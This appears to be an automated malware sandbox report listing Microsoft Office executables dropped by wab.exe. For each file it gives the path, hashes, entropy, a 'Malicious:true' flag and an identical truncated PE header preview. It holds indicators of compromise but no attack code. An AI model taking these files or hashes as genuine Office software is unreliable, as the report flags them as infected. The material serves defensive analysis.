                                                                                                Size (bytes):748192
                                                                                                Entropy (8bit):6.652535866207215
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:sKxLM1deLycUTc1kZi7zb1QRHhhj7WGvF5PYcdTFtZ3G97aSDGGHrbTwqFwydBf6:syY14evTc1kZi7zb1KHL8vbTlwOBC
                                                                                                MD5:6BA8B9E3FE4CDE976E7480E68BC2D0DF
                                                                                                SHA1:88A1B0CCECBB9F1D10303D6E727C7C8CAD46B157
                                                                                                SHA-256:B5D160CF12ECEDC0FADAB400C24A4B0096332CFD18ECACEE97A7D746EA36EA0F
                                                                                                SHA-512:0B7157C1FDA4F97CF56A2562FDF678EB946AE9FF76A6102487F6A32B146684A5E12D532802185AEEEC6AF99AFB026E6C7A71AB4BC3D85891923EAB91B246F915
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1917048
                                                                                                Entropy (8bit):3.7936073169931026
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:PBeXsm81c57ZXFzY5Ucyw4TapP25xxlq4cUcMeTOMzwMwZ:ZKs78A5UcyOPexxPcUcMeyvZ
                                                                                                MD5:1C15447004EDADF6833C19CB490ECE02
                                                                                                SHA1:EC2BDA5403AE8E0D06EA17CB56B70A6129E95FD5
                                                                                                SHA-256:29A87A9191EC08DDAAA96ADCAE7B131997BD487BECCF9182CB1CA517B8B9A1C6
                                                                                                SHA-512:2420427BA2F4FB7CC886AC96A38BA7909FD5403244EA9F0927A9CF83C22C2C46BEE2565ED8C9F5637D533A88916587D0B2677F4AB13B13A78526C6D26531D696
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4099520
                                                                                                Entropy (8bit):3.697376679380454
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:hyKs7cvZIFpCYVIUN2mGsb8HtkLaHLH04cLbUBRjLmP29DyZbT9oc/m06aCzE6hE:hyKsY+dy0ZScIBqBT11S0
                                                                                                MD5:89B7FD5BD551EB1C9F7347C6FB777C6F
                                                                                                SHA1:994B8F597860E88D2A0F56D2F4A1D46756F47307
                                                                                                SHA-256:267D501C9F2904DE5E11EB3D6D33AD081356D97F84388528E3B517691C1283A8
                                                                                                SHA-512:011AF68C1390FC0B4FC853FF96310ADF8936136C21D5E8909BF16A7E7FAF1CA324047CA03EACB16E6071A8AD9FA0943EC4937C51F895A3B6B162FAF7AE6C3D4F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):452120
                                                                                                Entropy (8bit):5.929411837073156
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:EvhCpFviM0OKAOVf3m+2fCz29fx8/eAeTu:EEpFVKj3mFn9q
                                                                                                MD5:8895327CB903B0DC08F23035A992E2B2
                                                                                                SHA1:C03E385FB58E49047E5E8A338265793EC94731EC
                                                                                                SHA-256:F9D3CDD157B30B4A98770225BFCCDDA2E71511B3A90339BFD2C8EBE11F05E3CF
                                                                                                SHA-512:B8D4557F3B8B67D7F569953FDB2A36F2F396B516F40751F6E6B2C905F614F552A163028772514B93C39B0724AB7B734E4BBECF361EDA2FA6BF8DF62740A51CA2
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):116664
                                                                                                Entropy (8bit):6.10338252591718
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoSpuG+Ogz7jzJQHt9+zwIws8p95Zs0v+ISDr34+3RnQymkst:/rk5uGaz7jFQ68ICP5q0WISDr34W+wst
                                                                                                MD5:6A915BA50F7E345F1062F27B1CA597F8
                                                                                                SHA1:EA91C6AE9800EA18BB949492D41CD42769CD6D7A
                                                                                                SHA-256:C3075BEF0B2FACF27E33C4CDF19DD11BC1C5DC93CDCC710B3C6B6C3AD7FB42A8
                                                                                                SHA-512:7AD107B4FDC3776269717D28A789BD8D2ADA898DF1FE34DDC3B93FFDFA9CCC6E01F017914F2D3FCECB23789147C43FB420AD099E0D2FEDDE106F18333CDA1112
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):167392
                                                                                                Entropy (8bit):6.22614950708567
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkgWKZbTKeR3Tzp+8IxR8jYYrjHaVLIPSL1CgNX:fWK11Rp+8II5SLUgp
                                                                                                MD5:4B763805BE542D63E26C934813DD48E1
                                                                                                SHA1:FE1C7ACF48DC8EB78744DDC16CFA04A232A8D8E9
                                                                                                SHA-256:500DBAA3FBAF86BE75A82B70BEA0C6550112B14C93FE4F87EBA018D787780D49
                                                                                                SHA-512:FFB9A1D674800302C4B7156DE4C49FF2421774061FFBCBE2E058BD119EE310DCF65CA2B123133FE05C2430613463DED3DA76AC1DD91EA0E18CC28AC036703EA2
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):670928
                                                                                                Entropy (8bit):5.936386014437268
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:4wbRB+ZRhFfGNpzX5PtiPWRnTLtx5eq4/RnYRoS2Ds+2EYR1XLlShtg7ksyST2Rz:4wbT+ZR3fGrzX5PtiPWRnTLtx5eq4/R9
                                                                                                MD5:EC4DCAECC36C36010C2E887BCF43E330
                                                                                                SHA1:E03D5A16C55182C2A2C3FEC77FA2B61DED2E8452
                                                                                                SHA-256:106C086E34880154252DC126B873022482E00DC5393221D0EEB58B6DD3F61613
                                                                                                SHA-512:CE653BB3AB1802439105C08E7DEEDB2FBF1800D5BADE205F44DCBE9BF000B0F439C948C273A45DA18A18C87D85EB7E64331992877EB8EB9D981C1CAB2C3E40E0
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):115920
                                                                                                Entropy (8bit):5.6753678855989245
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoEw9K75Rp1Ukkz2zct/rzdaBotnMuvWM6TUaE:/rkDw9K1Fiz2ir+o5vWM6TUaE
                                                                                                MD5:EA8D8609056B190AC92C23DD650BD6EF
                                                                                                SHA1:6426393186982F636CE121704382ABDFF75BB4A7
                                                                                                SHA-256:D2D09630ED66662A22F768DBC36F5202CC502D8FC58E6A2A5D29F59700006020
                                                                                                SHA-512:453D530CFEEA78084339119658DC2397A6848D19902AAB31B7BADB46EED6DAAECEA2564664181C724F8F16A9D616CF7DE44C03532AC2A306B48F97B10D4918B9
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):137776
                                                                                                Entropy (8bit):6.120121862589257
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoMLS+I1HtQdiHN4zbyezltnzGd1XuDxhkrTJwNZ5wmW1aHbfC:/rkCMi+zWeXdswvqiHm
                                                                                                MD5:829CB1493FD8C6F15376EEF64761531A
                                                                                                SHA1:282C572395117635B1C4C44732EEDE8CD65AF5F7
                                                                                                SHA-256:BFA3A7A9ABC6AFD35B2748CF257FD12A521722142ED9CA73B4E0B39A5190118B
                                                                                                SHA-512:243F353303DC74EF1183026EE65591BBFCB304F26A5CBE3E9E2EDEFA9946BF89C11BCA788EFC90B474D79371B5D38D13B6DBC466DB973BE5D9C570F168153D19
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1206680
                                                                                                Entropy (8bit):4.8259897811858545
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:+61ZFViRpx5tuwZl4asd/arEISgX0IkEMhTy:+61jViRTfVINdCr6gX0hEl
                                                                                                MD5:FB2BD6E7F39070E272740B92E84DB8AA
                                                                                                SHA1:1E7368F37A4E27701A124DE31E3604FF5F100EBB
                                                                                                SHA-256:1B338C2D04893C390870D5B7E554BF2926CDBB9BEA3058D459E09A07F416C843
                                                                                                SHA-512:88BA77D8180704EF8D7C9CA704A099D7945C13FF33099C26F59026E6A30E908F276B14081DDF01CFB86459F242DCA83E8B6C17D0172BC1DCA16F88B995D14939
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):400336
                                                                                                Entropy (8bit):6.545670669710066
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:G1rOCPapfd5bhooUBuFiExw/LXa20Dj6EzfJ:CrfIbbhooUBu3wzXa/Dj64
                                                                                                MD5:AB23B72F228F04A0DAFFF541E32A4EBA
                                                                                                SHA1:8770A0BAD7E668DEE5D226192DFA580B41F9878E
                                                                                                SHA-256:50FD4D6AE87587BE2E99F87FB937644EAD3D0F09BA41D18BFF24EFD8606F9DF4
                                                                                                SHA-512:658970F71F357BA0F241F14D77A3C59FFFB1A1961F75A9DD2C236412A0D451D109326DDE160A49FAE6776926B5912D01E8181709F6089C3567B906B5395D442D
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1662344
                                                                                                Entropy (8bit):4.231175782494914
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkfK2OKsuWoZEsVK2OKsuWoZEckAQckAIDpAPfKrss1yyKrss1yAZDvYbNDzVY9:IztkAzkAZqrEdrEAZUCwFjNNYEzcL
                                                                                                MD5:92FA319DBFAB7C5461D7090E78829B86
                                                                                                SHA1:484EE02AD12B66F92F34DFD4B420F7A6632AC2A0
                                                                                                SHA-256:776CCAC7EC3B35D5C22D5B67F8A167CFF50554EC1D31D679EE315353CA8B092D
                                                                                                SHA-512:E2FE18E0F9CE8E648042B626E7D516149A300E121B9FC94911DBD88EF74855C57F9926807528BA1423F262F65AE4044EFB1A669FF9AD21B818CACED6069BF847
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3531712
                                                                                                Entropy (8bit):3.7572585003160985
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rks2OKsuWoZE/B/SRD17QYFCYKsQojSXQojSfE1c9AvWiYwOsAE1c9881jLvsDF:GgSRJQYKV++VYwjatvsDVpDsehRAKzYM
                                                                                                MD5:BFB3BE900341A821EBD55FA532ECE5EE
                                                                                                SHA1:766D0BA424A86EBD4ADFA3E35BBC161BC0BF286C
                                                                                                SHA-256:B89EABA2791BD53C106CB478B3AFD3A06D1AA34C12C067324C5954B1560F9AA9
                                                                                                SHA-512:2A053A3F810B6DAC703B42A0628168B774DB051B390335725429AB566294E389BACBDA0BF5BF7378EB59A2EF769E73BB45736464E1BB3CBF5CC15CDBFC53B459
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):83880
                                                                                                Entropy (8bit):5.823944915840722
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoNKfEBr3fHT4nAzHGkYJ+ziw6+zb:/rkePh3IAzHGEJn
                                                                                                MD5:FC67F440A689C3EE90251D6C2C4E2C9D
                                                                                                SHA1:7F20C0098B95C41AC33A96F4ABF0581AE3E5D995
                                                                                                SHA-256:F428B30BEB050212F0A9E6FA72E4D7FCF86CD52B3FB9FD43E5A0FC54C3B489BB
                                                                                                SHA-512:982943EE35AA49ADAB5E45E7FD7AD209FF4BE057C71B2B732DDDCFC78B3673C0EC8CEA83B7DA2C82BAE73BE0E1B4A0C66C497F519C5F46AB31BB6CB7D247DE06
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4319112
                                                                                                Entropy (8bit):3.7943883996506433
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:uUh82lTMY/C3uuQyMyquNlBXYJ7M444IB:ukyIgG47B
                                                                                                MD5:FEB87B50F28805BBBFD4E61540E74928
                                                                                                SHA1:8AD8B96031374469E1C8A6603B20B2D54D6952C3
                                                                                                SHA-256:54B62651B987E81F90B6B8BB1F74CDACE2B0FA0D507B97DD45D789F8377A38F9
                                                                                                SHA-512:ABA09F5254CB6BF70093997C4347DC545254C7C289723C62287F2D31D9F0B41206380DAF93E5F8DA0F2D5A3BC1BF0F18C5F6746E83948C36F4A6954789E4784A
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):785448
                                                                                                Entropy (8bit):3.8385138127727325
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:oWSXeSC+hBMdNRneNMToeGYeneqjpGtBlmF:oLevUEcLe9l2
                                                                                                MD5:1402F0423B2FB1FF2782284DD0D90BD8
                                                                                                SHA1:7CA6379EE4FA2348E7373632E689715AA8451C8E
                                                                                                SHA-256:E4268E89FF0D78048C987424945B1C65773926EBD9122923E1B84D2D7ED0476D
                                                                                                SHA-512:22B2A31E677A410EEF0CB40587EC881E2D29EB06B64123116A6E58572C1FD9B53DFB73B788A42C3DC0E615C88BE3BD949CC2E04F3422A4130B4954AE129F4B11
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1081280
                                                                                                Entropy (8bit):3.6924247178826266
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkOyTUawK12P04ti0o5gmQNJDJnJG20FxPlJPJSS12Zzwww6G:9s4wqmQN59wtSS2zwmG
                                                                                                MD5:C375297B394AD1111289612F87FFEA9F
                                                                                                SHA1:F5FC1F348DD8344D9BCEA024964BB0B5FF018B01
                                                                                                SHA-256:ABF9CE89E824EC6E39F30000F3F8928FCDD6E506897505B9E19CEC4EBF7E5E1A
                                                                                                SHA-512:E0F105D82F4E0BC6F503877F56D48CC742A702C5A80665B9C97F674A5F1EBB18567E78DB5B180E9FC1A252C0682D33980F553C8700DDB31A7A45ECD727CA48B6
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1722808
                                                                                                Entropy (8bit):6.458274782007939
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:vuoh1EWXRkd+h9y6NsRZ9MtL4kD5G5LVuhqITJemL9SQM3:vuohO2km9PNsRZ9MtL4ktG5LV93
                                                                                                MD5:C94CAD958EFE5BB77D4D31CF9D62D863
                                                                                                SHA1:D1BD3FCDD57BDE432F49D020985257B26014C84D
                                                                                                SHA-256:B9A4C86E6AFD87E343FF29FA306FE257A426AF7C4F3B30F0172735D9FCCCDA2D
                                                                                                SHA-512:4547EB7B45411F4AFD00E2C35DA91BFA142B5B11151466C888A0ED6BC20A326DFBF8D4B1BBBFA8FA56DFDFDE40DABAB7FE26F88A838B9BEBF22A0097F54E7106
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):307784
                                                                                                Entropy (8bit):6.374475137741311
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:9+OpwoajoJ/cLr6eNI0A2kg79zge/ceeE1+v:9DWhS5g72veeU+v
                                                                                                MD5:6BF22D15646E7998D748CD42C23AB626
                                                                                                SHA1:89D49CF33D773AD86B4E1CC7D9E7021216B937B0
                                                                                                SHA-256:AF364BB28D01FC59D7A9A9CD9A2CACC66D0E0020C64D93E8C5A0BBC95DFE8C6E
                                                                                                SHA-512:3BF8681007FE707F8E87B28F0D0F6263C6247FE251C2B9339322063B029BACA0BDB9FFD5058B02C04132765F08A39933D8663CA7444441294E0C5888D3D8F2F4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):97920
                                                                                                Entropy (8bit):5.808712601175728
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3Vo3zKAtCz72I/Q/RPTO5piDDFwzS:/rkguFvgy5piDD6zS
                                                                                                MD5:2196FCEBBDCC593CF5A85F3207970CA4
                                                                                                SHA1:9C6B9085378B56500161BDA6339E791A7829F56F
                                                                                                SHA-256:B40B4E0A728C5BE2D266FD6BE1E719E65C5DC10D46F15B2DEB346D3ED1B2421D
                                                                                                SHA-512:56D7A1B02F56F3BEE9E0038857EF025B0896004A3A077089EE15DC21E3D80C2DD27D46AE11BB7BA877B540C8408EAFEFE57D9B4BE7B05164F33ECA61ACD2F650
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1994448
                                                                                                Entropy (8bit):6.525646487599016
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Jl8U9+tiqfG7C+5I6ZOX0Bh4MdDHc/EBRXXZUABfmcQ:Jl8+++7hOXODHc/EdQ
                                                                                                MD5:410F8406572FEEF24894B4A4E98FFA77
                                                                                                SHA1:A84E51801825B47741FF4ADBA49FBADFC0A44E4B
                                                                                                SHA-256:21C6F535FC1ECE2A2CF21F0C54BA190A6A065E4F241AA1DB2068E42AD424FBCA
                                                                                                SHA-512:C6543AC541D669DD8B6286DACAD02F25854276EE41DA02F00471CDF6ACCB87CAD04CF517D2712A1E5F88E1BCCE29DCB21183D6C047E94CACB9C2ABAD27D8C22A
                                                                                                Malicious:true
